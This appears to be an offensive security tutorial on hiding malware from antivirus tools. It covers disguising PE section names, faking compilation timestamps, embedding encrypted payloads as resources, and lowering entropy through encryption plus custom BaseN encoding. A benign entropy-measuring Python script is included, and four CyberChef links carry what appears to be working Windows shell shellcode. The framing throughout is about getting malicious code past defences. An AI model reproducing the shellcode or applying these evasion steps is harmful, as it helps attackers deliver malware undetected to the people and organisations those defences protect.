Credit to Patryk for showing these techniques
Simple Shellcode Loader with minimal detection rate
Detecting Sandbox Environments
Anti-disassembly obfuscation using LLVM & Advanced String Obfuscation
Injecting COFF Object Files In Memory
Antimalware solutions can use three types of detection mechanisms
-
Signature-based detection: static inspection of file checksums (MD5, SHA1 etc.) and presence of known strings or byte sequences in the binary,
-
Heuristic detection: (usually) static analysis of application behavior and identification of potentially malicious characteristics (e.g. use of specific functions which are usually associated with malware),
-
Sandboxing: dynamic analysis of the program which gets executed in a controlled environment (sandbox) where its actions are monitored.
Multiple techniques exist that evade different detection mechanisms. For example:
-
Polymorphic (or at least often recompiled) malware can defeat signature-based detection
-
Obfuscation of code flow can evade heuristics based detection
-
Conditional statements based on environmental checks can detect and bypass sandboxes
-
Encoding or encryption of sensitive information can help bypass signature-based detection as well as heuristic detection
While statically examining a malicious sample, malware analysts look at PE file structure and contents. This data may reveal certain details about the application and help classify it as a malware. We talked about imports, now let’s focus on other PE sections, embedded resources and timestamps.
The thing to note here is that we should ensure that section names reflect a legitimate, compiled PE structure. For example, packers may change sections names to random character strings or even obvious indicators of packer software (UPX0
, UPX1
etc.).
Adding a new section may also raise suspicions - it may be better idea to store data in the existing resources section.
Also, section raw size (size on disk) should usually be almost equal to virtual size (size in memory when the image is loaded) - small differences are common due to different memory alignments (disk vs RAM). For example, .text
section with raw size of 0
and virtual size of hundreds of KBs probably means that the actual executable was packed.
We can embed any data in the executable as a resource - for example an icon, a decoy document or a shellcode. However everything will be visible with Resource Hacker
or any similar tool. It is a good idea to embed malicious resources encrypted or using steganography to make it more difficult to inspect them.
PE header contains TimeDateStamp
4-byte field which is Unix time of compilation. This can be easily changed (for example with hex editor) to hide the actual compilation date.
Entropy analysis can be used to easily find potentially encrypted content embedded in the executable. Encrypted data usually has relatively high entropy (almost 8 bits). The same applies for compressed data.
We can use this simple Python script (be sure to install pefile
module) to calculate the entropy of PE file sections:
import sys
import math
import pefile
import peutils
def Entropy(data):
entropy = 0
if not data:
return 0
ent = 0
for x in range(256):
p_x = float(data.count(x))/len(data)
if p_x > 0:
entropy += - p_x*math.log(p_x, 2)
return entropy
pe=pefile.PE(sys.argv[1])
for s in pe.sections:
print (s.Name.decode('utf-8').strip('\\x00') + "\\t" + str(Entropy(s.get_data())))
Let’s start with simple shellcode loader we developed before. Here’s sections entropy:
.text 4.616090501867742
.rdata 5.4577520758849944
.pdata 0.10191042566270775
.rsrc 4.7015032582517895
Application code located in .text.
section has entropy comparable with human language text. Shellcode is located in .rdata
section which has a slightly higher entropy.
Now let’s embed some large blob of encrypted data, for example by adding a resource to the executable. As we can see below, the .rsrc
section probably contains some encrypted or compressed data. Actually, it could be some image or any other file format which uses compression.
.text 4.616090501867742
.rdata 5.458570681613711
.pdata 0.10191042566270775
.rsrc 7.95737230129355
To simply manipulate the entropy of a data block, we could use Base64 encoding. See the entropy values for [plain shellcode](https://gchq.github.io/CyberChef/#recipe=From_Hex('\\x')Entropy('Shannon scale')&input=XHhmY1x4NDhceDgzXHhlNFx4ZjBceGU4XHhjMFx4MDBceDAwXHgwMFx4NDFceDUxXHg0MVx4NTBceDUyXHg1MVx4NTZceDQ4XHgzMVx4ZDJceDY1XHg0OFx4OGJceDUyXHg2MFx4NDhceDhiXHg1Mlx4MThceDQ4XHg4Ylx4NTJceDIwXHg0OFx4OGJceDcyXHg1MFx4NDhceDBmXHhiN1x4NGFceDRhXHg0ZFx4MzFceGM5XHg0OFx4MzFceGMwXHhhY1x4M2NceDYxXHg3Y1x4MDJceDJjXHgyMFx4NDFceGMxXHhjOVx4MGRceDQxXHgwMVx4YzFceGUyXHhlZFx4NTJceDQxXHg1MVx4NDhceDhiXHg1Mlx4MjBceDhiXHg0Mlx4M2NceDQ4XHgwMVx4ZDBceDhiXHg4MFx4ODhceDAwXHgwMFx4MDBceDQ4XHg4NVx4YzBceDc0XHg2N1x4NDhceDAxXHhkMFx4NTBceDhiXHg0OFx4MThceDQ0XHg4Ylx4NDBceDIwXHg0OVx4MDFceGQwXHhlM1x4NTZceDQ4XHhmZlx4YzlceDQxXHg4Ylx4MzRceDg4XHg0OFx4MDFceGQ2XHg0ZFx4MzFceGM5XHg0OFx4MzFceGMwXHhhY1x4NDFceGMxXHhjOVx4MGRceDQxXHgwMVx4YzFceDM4XHhlMFx4NzVceGYxXHg0Y1x4MDNceDRjXHgyNFx4MDhceDQ1XHgzOVx4ZDFceDc1XHhkOFx4NThceDQ0XHg4Ylx4NDBceDI0XHg0OVx4MDFceGQwXHg2Nlx4NDFceDhiXHgwY1x4NDhceDQ0XHg4Ylx4NDBceDFjXHg0OVx4MDFceGQwXHg0MVx4OGJceDA0XHg4OFx4NDhceDAxXHhkMFx4NDFceDU4XHg0MVx4NThceDVlXHg1OVx4NWFceDQxXHg1OFx4NDFceDU5XHg0MVx4NWFceDQ4XHg4M1x4ZWNceDIwXHg0MVx4NTJceGZmXHhlMFx4NThceDQxXHg1OVx4NWFceDQ4XHg4Ylx4MTJceGU5XHg1N1x4ZmZceGZmXHhmZlx4NWRceDQ5XHhiZVx4NzdceDczXHgzMlx4NWZceDMzXHgzMlx4MDBceDAwXHg0MVx4NTZceDQ5XHg4OVx4ZTZceDQ4XHg4MVx4ZWNceGEwXHgwMVx4MDBceDAwXHg0OVx4ODlceGU1XHg0OVx4YmNceDAyXHgwMFx4MTFceDVjXHgwMFx4MDBceDAwXHgwMFx4NDFceDU0XHg0OVx4ODlceGU0XHg0Y1x4ODlceGYxXHg0MVx4YmFceDRjXHg3N1x4MjZceDA3XHhmZlx4ZDVceDRjXHg4OVx4ZWFceDY4XHgwMVx4MDFceDAwXHgwMFx4NTlceDQxXHhiYVx4MjlceDgwXHg2Ylx4MDBceGZmXHhkNVx4NTBceDUwXHg0ZFx4MzFceGM5XHg0ZFx4MzFceGMwXHg0OFx4ZmZceGMwXHg0OFx4ODlceGMyXHg0OFx4ZmZceGMwXHg0OFx4ODlceGMxXHg0MVx4YmFceGVhXHgwZlx4ZGZceGUwXHhmZlx4ZDVceDQ4XHg4OVx4YzdceDZhXHgxMFx4NDFceDU4XHg0Y1x4ODlceGUyXHg0OFx4ODlceGY5XHg0MVx4YmFceGMyXHhkYlx4MzdceDY3XHhmZlx4ZDVceDQ4XHgzMVx4ZDJceDQ4XHg4OVx4ZjlceDQxXHhiYVx4YjdceGU5XHgzOFx4ZmZceGZmXHhkNVx4NGRceDMxXHhjMFx4NDhceDMxXHhkMlx4NDhceDg5XHhmOVx4NDFceGJhXHg3NFx4ZWNceDNiXHhlMVx4ZmZceGQ1XHg0OFx4ODlceGY5XHg0OFx4ODlceGM3XHg0MVx4YmFceDc1XHg2ZVx4NGRceDYxXHhmZlx4ZDVceDQ4XHg4MVx4YzRceGEwXHgwMlx4MDBceDAwXHg0OVx4YjhceDYzXHg2ZFx4NjRceDAwXHgwMFx4MDBceDAwXHgwMFx4NDFceDUwXHg0MVx4NTBceDQ4XHg4OVx4ZTJceDU3XHg1N1x4NTdceDRkXHgzMVx4YzBceDZhXHgwZFx4NTlceDQxXHg1MFx4ZTJceGZjXHg2Nlx4YzdceDQ0XHgyNFx4NTRceDAxXHgwMVx4NDhceDhkXHg0NFx4MjRceDE4XHhjNlx4MDBceDY4XHg0OFx4ODlceGU2XHg1Nlx4NTBceDQxXHg1MFx4NDFceDUwXHg0MVx4NTBceDQ5XHhmZlx4YzBceDQxXHg1MFx4NDlceGZmXHhjOFx4NGRceDg5XHhjMVx4NGNceDg5XHhjMVx4NDFceGJhXHg3OVx4Y2NceDNmXHg4Nlx4ZmZceGQ1XHg0OFx4MzFceGQyXHg0OFx4ZmZceGNhXHg4Ylx4MGVceDQxXHhiYVx4MDhceDg3XHgxZFx4NjBceGZmXHhkNVx4YmJceGYwXHhiNVx4YTJceDU2XHg0MVx4YmFceGE2XHg5NVx4YmRceDlkXHhmZlx4ZDVceDQ4XHg4M1x4YzRceDI4XHgzY1x4MDZceDdjXHgwYVx4ODBceGZiXHhlMFx4NzVceDA1XHhiYlx4NDdceDEzXHg3Mlx4NmZceDZhXHgwMFx4NTlceDQxXHg4OVx4ZGFceGZmXHhkNQ), [AES-encrypted](https://gchq.github.io/CyberChef/#recipe=From_Hex('\\x')AES_Encrypt({'option':'Hex','string':'42138947829316abfa38addd8239088a'},{'option':'Hex','string':'983274bfbca8dde7938454875984aa7d'},'CBC','Raw','Raw')Entropy('Shannon scale')&input=XHhmY1x4NDhceDgzXHhlNFx4ZjBceGU4XHhjMFx4MDBceDAwXHgwMFx4NDFceDUxXHg0MVx4NTBceDUyXHg1MVx4NTZceDQ4XHgzMVx4ZDJceDY1XHg0OFx4OGJceDUyXHg2MFx4NDhceDhiXHg1Mlx4MThceDQ4XHg4Ylx4NTJceDIwXHg0OFx4OGJceDcyXHg1MFx4NDhceDBmXHhiN1x4NGFceDRhXHg0ZFx4MzFceGM5XHg0OFx4MzFceGMwXHhhY1x4M2NceDYxXHg3Y1x4MDJceDJjXHgyMFx4NDFceGMxXHhjOVx4MGRceDQxXHgwMVx4YzFceGUyXHhlZFx4NTJceDQxXHg1MVx4NDhceDhiXHg1Mlx4MjBceDhiXHg0Mlx4M2NceDQ4XHgwMVx4ZDBceDhiXHg4MFx4ODhceDAwXHgwMFx4MDBceDQ4XHg4NVx4YzBceDc0XHg2N1x4NDhceDAxXHhkMFx4NTBceDhiXHg0OFx4MThceDQ0XHg4Ylx4NDBceDIwXHg0OVx4MDFceGQwXHhlM1x4NTZceDQ4XHhmZlx4YzlceDQxXHg4Ylx4MzRceDg4XHg0OFx4MDFceGQ2XHg0ZFx4MzFceGM5XHg0OFx4MzFceGMwXHhhY1x4NDFceGMxXHhjOVx4MGRceDQxXHgwMVx4YzFceDM4XHhlMFx4NzVceGYxXHg0Y1x4MDNceDRjXHgyNFx4MDhceDQ1XHgzOVx4ZDFceDc1XHhkOFx4NThceDQ0XHg4Ylx4NDBceDI0XHg0OVx4MDFceGQwXHg2Nlx4NDFceDhiXHgwY1x4NDhceDQ0XHg4Ylx4NDBceDFjXHg0OVx4MDFceGQwXHg0MVx4OGJceDA0XHg4OFx4NDhceDAxXHhkMFx4NDFceDU4XHg0MVx4NThceDVlXHg1OVx4NWFceDQxXHg1OFx4NDFceDU5XHg0MVx4NWFceDQ4XHg4M1x4ZWNceDIwXHg0MVx4NTJceGZmXHhlMFx4NThceDQxXHg1OVx4NWFceDQ4XHg4Ylx4MTJceGU5XHg1N1x4ZmZceGZmXHhmZlx4NWRceDQ5XHhiZVx4NzdceDczXHgzMlx4NWZceDMzXHgzMlx4MDBceDAwXHg0MVx4NTZceDQ5XHg4OVx4ZTZceDQ4XHg4MVx4ZWNceGEwXHgwMVx4MDBceDAwXHg0OVx4ODlceGU1XHg0OVx4YmNceDAyXHgwMFx4MTFceDVjXHgwMFx4MDBceDAwXHgwMFx4NDFceDU0XHg0OVx4ODlceGU0XHg0Y1x4ODlceGYxXHg0MVx4YmFceDRjXHg3N1x4MjZceDA3XHhmZlx4ZDVceDRjXHg4OVx4ZWFceDY4XHgwMVx4MDFceDAwXHgwMFx4NTlceDQxXHhiYVx4MjlceDgwXHg2Ylx4MDBceGZmXHhkNVx4NTBceDUwXHg0ZFx4MzFceGM5XHg0ZFx4MzFceGMwXHg0OFx4ZmZceGMwXHg0OFx4ODlceGMyXHg0OFx4ZmZceGMwXHg0OFx4ODlceGMxXHg0MVx4YmFceGVhXHgwZlx4ZGZceGUwXHhmZlx4ZDVceDQ4XHg4OVx4YzdceDZhXHgxMFx4NDFceDU4XHg0Y1x4ODlceGUyXHg0OFx4ODlceGY5XHg0MVx4YmFceGMyXHhkYlx4MzdceDY3XHhmZlx4ZDVceDQ4XHgzMVx4ZDJceDQ4XHg4OVx4ZjlceDQxXHhiYVx4YjdceGU5XHgzOFx4ZmZceGZmXHhkNVx4NGRceDMxXHhjMFx4NDhceDMxXHhkMlx4NDhceDg5XHhmOVx4NDFceGJhXHg3NFx4ZWNceDNiXHhlMVx4ZmZceGQ1XHg0OFx4ODlceGY5XHg0OFx4ODlceGM3XHg0MVx4YmFceDc1XHg2ZVx4NGRceDYxXHhmZlx4ZDVceDQ4XHg4MVx4YzRceGEwXHgwMlx4MDBceDAwXHg0OVx4YjhceDYzXHg2ZFx4NjRceDAwXHgwMFx4MDBceDAwXHgwMFx4NDFceDUwXHg0MVx4NTBceDQ4XHg4OVx4ZTJceDU3XHg1N1x4NTdceDRkXHgzMVx4YzBceDZhXHgwZFx4NTlceDQxXHg1MFx4ZTJceGZjXHg2Nlx4YzdceDQ0XHgyNFx4NTRceDAxXHgwMVx4NDhceDhkXHg0NFx4MjRceDE4XHhjNlx4MDBceDY4XHg0OFx4ODlceGU2XHg1Nlx4NTBceDQxXHg1MFx4NDFceDUwXHg0MVx4NTBceDQ5XHhmZlx4YzBceDQxXHg1MFx4NDlceGZmXHhjOFx4NGRceDg5XHhjMVx4NGNceDg5XHhjMVx4NDFceGJhXHg3OVx4Y2NceDNmXHg4Nlx4ZmZceGQ1XHg0OFx4MzFceGQyXHg0OFx4ZmZceGNhXHg4Ylx4MGVceDQxXHhiYVx4MDhceDg3XHgxZFx4NjBceGZmXHhkNVx4YmJceGYwXHhiNVx4YTJceDU2XHg0MVx4YmFceGE2XHg5NVx4YmRceDlkXHhmZlx4ZDVceDQ4XHg4M1x4YzRceDI4XHgzY1x4MDZceDdjXHgwYVx4ODBceGZiXHhlMFx4NzVceDA1XHhiYlx4NDdceDEzXHg3Mlx4NmZceDZhXHgwMFx4NTlceDQxXHg4OVx4ZGFceGZmXHhkNQ), [GZIP-compressed](https://gchq.github.io/CyberChef/#recipe=From_Hex('\\x')Gzip('Dynamic Huffman Coding','','',false)Entropy('Shannon scale')&input=XHhmY1x4NDhceDgzXHhlNFx4ZjBceGU4XHhjMFx4MDBceDAwXHgwMFx4NDFceDUxXHg0MVx4NTBceDUyXHg1MVx4NTZceDQ4XHgzMVx4ZDJceDY1XHg0OFx4OGJceDUyXHg2MFx4NDhceDhiXHg1Mlx4MThceDQ4XHg4Ylx4NTJceDIwXHg0OFx4OGJceDcyXHg1MFx4NDhceDBmXHhiN1x4NGFceDRhXHg0ZFx4MzFceGM5XHg0OFx4MzFceGMwXHhhY1x4M2NceDYxXHg3Y1x4MDJceDJjXHgyMFx4NDFceGMxXHhjOVx4MGRceDQxXHgwMVx4YzFceGUyXHhlZFx4NTJceDQxXHg1MVx4NDhceDhiXHg1Mlx4MjBceDhiXHg0Mlx4M2NceDQ4XHgwMVx4ZDBceDhiXHg4MFx4ODhceDAwXHgwMFx4MDBceDQ4XHg4NVx4YzBceDc0XHg2N1x4NDhceDAxXHhkMFx4NTBceDhiXHg0OFx4MThceDQ0XHg4Ylx4NDBceDIwXHg0OVx4MDFceGQwXHhlM1x4NTZceDQ4XHhmZlx4YzlceDQxXHg4Ylx4MzRceDg4XHg0OFx4MDFceGQ2XHg0ZFx4MzFceGM5XHg0OFx4MzFceGMwXHhhY1x4NDFceGMxXHhjOVx4MGRceDQxXHgwMVx4YzFceDM4XHhlMFx4NzVceGYxXHg0Y1x4MDNceDRjXHgyNFx4MDhceDQ1XHgzOVx4ZDFceDc1XHhkOFx4NThceDQ0XHg4Ylx4NDBceDI0XHg0OVx4MDFceGQwXHg2Nlx4NDFceDhiXHgwY1x4NDhceDQ0XHg4Ylx4NDBceDFjXHg0OVx4MDFceGQwXHg0MVx4OGJceDA0XHg4OFx4NDhceDAxXHhkMFx4NDFceDU4XHg0MVx4NThceDVlXHg1OVx4NWFceDQxXHg1OFx4NDFceDU5XHg0MVx4NWFceDQ4XHg4M1x4ZWNceDIwXHg0MVx4NTJceGZmXHhlMFx4NThceDQxXHg1OVx4NWFceDQ4XHg4Ylx4MTJceGU5XHg1N1x4ZmZceGZmXHhmZlx4NWRceDQ5XHhiZVx4NzdceDczXHgzMlx4NWZceDMzXHgzMlx4MDBceDAwXHg0MVx4NTZceDQ5XHg4OVx4ZTZceDQ4XHg4MVx4ZWNceGEwXHgwMVx4MDBceDAwXHg0OVx4ODlceGU1XHg0OVx4YmNceDAyXHgwMFx4MTFceDVjXHgwMFx4MDBceDAwXHgwMFx4NDFceDU0XHg0OVx4ODlceGU0XHg0Y1x4ODlceGYxXHg0MVx4YmFceDRjXHg3N1x4MjZceDA3XHhmZlx4ZDVceDRjXHg4OVx4ZWFceDY4XHgwMVx4MDFceDAwXHgwMFx4NTlceDQxXHhiYVx4MjlceDgwXHg2Ylx4MDBceGZmXHhkNVx4NTBceDUwXHg0ZFx4MzFceGM5XHg0ZFx4MzFceGMwXHg0OFx4ZmZceGMwXHg0OFx4ODlceGMyXHg0OFx4ZmZceGMwXHg0OFx4ODlceGMxXHg0MVx4YmFceGVhXHgwZlx4ZGZceGUwXHhmZlx4ZDVceDQ4XHg4OVx4YzdceDZhXHgxMFx4NDFceDU4XHg0Y1x4ODlceGUyXHg0OFx4ODlceGY5XHg0MVx4YmFceGMyXHhkYlx4MzdceDY3XHhmZlx4ZDVceDQ4XHgzMVx4ZDJceDQ4XHg4OVx4ZjlceDQxXHhiYVx4YjdceGU5XHgzOFx4ZmZceGZmXHhkNVx4NGRceDMxXHhjMFx4NDhceDMxXHhkMlx4NDhceDg5XHhmOVx4NDFceGJhXHg3NFx4ZWNceDNiXHhlMVx4ZmZceGQ1XHg0OFx4ODlceGY5XHg0OFx4ODlceGM3XHg0MVx4YmFceDc1XHg2ZVx4NGRceDYxXHhmZlx4ZDVceDQ4XHg4MVx4YzRceGEwXHgwMlx4MDBceDAwXHg0OVx4YjhceDYzXHg2ZFx4NjRceDAwXHgwMFx4MDBceDAwXHgwMFx4NDFceDUwXHg0MVx4NTBceDQ4XHg4OVx4ZTJceDU3XHg1N1x4NTdceDRkXHgzMVx4YzBceDZhXHgwZFx4NTlceDQxXHg1MFx4ZTJceGZjXHg2Nlx4YzdceDQ0XHgyNFx4NTRceDAxXHgwMVx4NDhceDhkXHg0NFx4MjRceDE4XHhjNlx4MDBceDY4XHg0OFx4ODlceGU2XHg1Nlx4NTBceDQxXHg1MFx4NDFceDUwXHg0MVx4NTBceDQ5XHhmZlx4YzBceDQxXHg1MFx4NDlceGZmXHhjOFx4NGRceDg5XHhjMVx4NGNceDg5XHhjMVx4NDFceGJhXHg3OVx4Y2NceDNmXHg4Nlx4ZmZceGQ1XHg0OFx4MzFceGQyXHg0OFx4ZmZceGNhXHg4Ylx4MGVceDQxXHhiYVx4MDhceDg3XHgxZFx4NjBceGZmXHhkNVx4YmJceGYwXHhiNVx4YTJceDU2XHg0MVx4YmFceGE2XHg5NVx4YmRceDlkXHhmZlx4ZDVceDQ4XHg4M1x4YzRceDI4XHgzY1x4MDZceDdjXHgwYVx4ODBceGZiXHhlMFx4NzVceDA1XHhiYlx4NDdceDEzXHg3Mlx4NmZceDZhXHgwMFx4NTlceDQxXHg4OVx4ZGFceGZmXHhkNQ) and [Base64-encoded](https://gchq.github.io/CyberChef/#recipe=From_Hex('\\x')To_Base64('A-Za-z0-9%2B/%3D')Entropy('Shannon scale')&input=XHhmY1x4NDhceDgzXHhlNFx4ZjBceGU4XHhjMFx4MDBceDAwXHgwMFx4NDFceDUxXHg0MVx4NTBceDUyXHg1MVx4NTZceDQ4XHgzMVx4ZDJceDY1XHg0OFx4OGJceDUyXHg2MFx4NDhceDhiXHg1Mlx4MThceDQ4XHg4Ylx4NTJceDIwXHg0OFx4OGJceDcyXHg1MFx4NDhceDBmXHhiN1x4NGFceDRhXHg0ZFx4MzFceGM5XHg0OFx4MzFceGMwXHhhY1x4M2NceDYxXHg3Y1x4MDJceDJjXHgyMFx4NDFceGMxXHhjOVx4MGRceDQxXHgwMVx4YzFceGUyXHhlZFx4NTJceDQxXHg1MVx4NDhceDhiXHg1Mlx4MjBceDhiXHg0Mlx4M2NceDQ4XHgwMVx4ZDBceDhiXHg4MFx4ODhceDAwXHgwMFx4MDBceDQ4XHg4NVx4YzBceDc0XHg2N1x4NDhceDAxXHhkMFx4NTBceDhiXHg0OFx4MThceDQ0XHg4Ylx4NDBceDIwXHg0OVx4MDFceGQwXHhlM1x4NTZceDQ4XHhmZlx4YzlceDQxXHg4Ylx4MzRceDg4XHg0OFx4MDFceGQ2XHg0ZFx4MzFceGM5XHg0OFx4MzFceGMwXHhhY1x4NDFceGMxXHhjOVx4MGRceDQxXHgwMVx4YzFceDM4XHhlMFx4NzVceGYxXHg0Y1x4MDNceDRjXHgyNFx4MDhceDQ1XHgzOVx4ZDFceDc1XHhkOFx4NThceDQ0XHg4Ylx4NDBceDI0XHg0OVx4MDFceGQwXHg2Nlx4NDFceDhiXHgwY1x4NDhceDQ0XHg4Ylx4NDBceDFjXHg0OVx4MDFceGQwXHg0MVx4OGJceDA0XHg4OFx4NDhceDAxXHhkMFx4NDFceDU4XHg0MVx4NThceDVlXHg1OVx4NWFceDQxXHg1OFx4NDFceDU5XHg0MVx4NWFceDQ4XHg4M1x4ZWNceDIwXHg0MVx4NTJceGZmXHhlMFx4NThceDQxXHg1OVx4NWFceDQ4XHg4Ylx4MTJceGU5XHg1N1x4ZmZceGZmXHhmZlx4NWRceDQ5XHhiZVx4NzdceDczXHgzMlx4NWZceDMzXHgzMlx4MDBceDAwXHg0MVx4NTZceDQ5XHg4OVx4ZTZceDQ4XHg4MVx4ZWNceGEwXHgwMVx4MDBceDAwXHg0OVx4ODlceGU1XHg0OVx4YmNceDAyXHgwMFx4MTFceDVjXHgwMFx4MDBceDAwXHgwMFx4NDFceDU0XHg0OVx4ODlceGU0XHg0Y1x4ODlceGYxXHg0MVx4YmFceDRjXHg3N1x4MjZceDA3XHhmZlx4ZDVceDRjXHg4OVx4ZWFceDY4XHgwMVx4MDFceDAwXHgwMFx4NTlceDQxXHhiYVx4MjlceDgwXHg2Ylx4MDBceGZmXHhkNVx4NTBceDUwXHg0ZFx4MzFceGM5XHg0ZFx4MzFceGMwXHg0OFx4ZmZceGMwXHg0OFx4ODlceGMyXHg0OFx4ZmZceGMwXHg0OFx4ODlceGMxXHg0MVx4YmFceGVhXHgwZlx4ZGZceGUwXHhmZlx4ZDVceDQ4XHg4OVx4YzdceDZhXHgxMFx4NDFceDU4XHg0Y1x4ODlceGUyXHg0OFx4ODlceGY5XHg0MVx4YmFceGMyXHhkYlx4MzdceDY3XHhmZlx4ZDVceDQ4XHgzMVx4ZDJceDQ4XHg4OVx4ZjlceDQxXHhiYVx4YjdceGU5XHgzOFx4ZmZceGZmXHhkNVx4NGRceDMxXHhjMFx4NDhceDMxXHhkMlx4NDhceDg5XHhmOVx4NDFceGJhXHg3NFx4ZWNceDNiXHhlMVx4ZmZceGQ1XHg0OFx4ODlceGY5XHg0OFx4ODlceGM3XHg0MVx4YmFceDc1XHg2ZVx4NGRceDYxXHhmZlx4ZDVceDQ4XHg4MVx4YzRceGEwXHgwMlx4MDBceDAwXHg0OVx4YjhceDYzXHg2ZFx4NjRceDAwXHgwMFx4MDBceDAwXHgwMFx4NDFceDUwXHg0MVx4NTBceDQ4XHg4OVx4ZTJceDU3XHg1N1x4NTdceDRkXHgzMVx4YzBceDZhXHgwZFx4NTlceDQxXHg1MFx4ZTJceGZjXHg2Nlx4YzdceDQ0XHgyNFx4NTRceDAxXHgwMVx4NDhceDhkXHg0NFx4MjRceDE4XHhjNlx4MDBceDY4XHg0OFx4ODlceGU2XHg1Nlx4NTBceDQxXHg1MFx4NDFceDUwXHg0MVx4NTBceDQ5XHhmZlx4YzBceDQxXHg1MFx4NDlceGZmXHhjOFx4NGRceDg5XHhjMVx4NGNceDg5XHhjMVx4NDFceGJhXHg3OVx4Y2NceDNmXHg4Nlx4ZmZceGQ1XHg0OFx4MzFceGQyXHg0OFx4ZmZceGNhXHg4Ylx4MGVceDQxXHhiYVx4MDhceDg3XHgxZFx4NjBceGZmXHhkNVx4YmJceGYwXHhiNVx4YTJceDU2XHg0MVx4YmFceGE2XHg5NVx4YmRceDlkXHhmZlx4ZDVceDQ4XHg4M1x4YzRceDI4XHgzY1x4MDZceDdjXHgwYVx4ODBceGZiXHhlMFx4NzVceDA1XHhiYlx4NDdceDEzXHg3Mlx4NmZceDZhXHgwMFx4NTlceDQxXHg4OVx4ZGFceGZmXHhkNQ). So to defeat basic entropy analysis we could encrypt and then encode the data/payload using for example a custom variation of Base64 (or Base62 or any other - entropy of BaseN encoded data will be roughly equal to log2(N) ).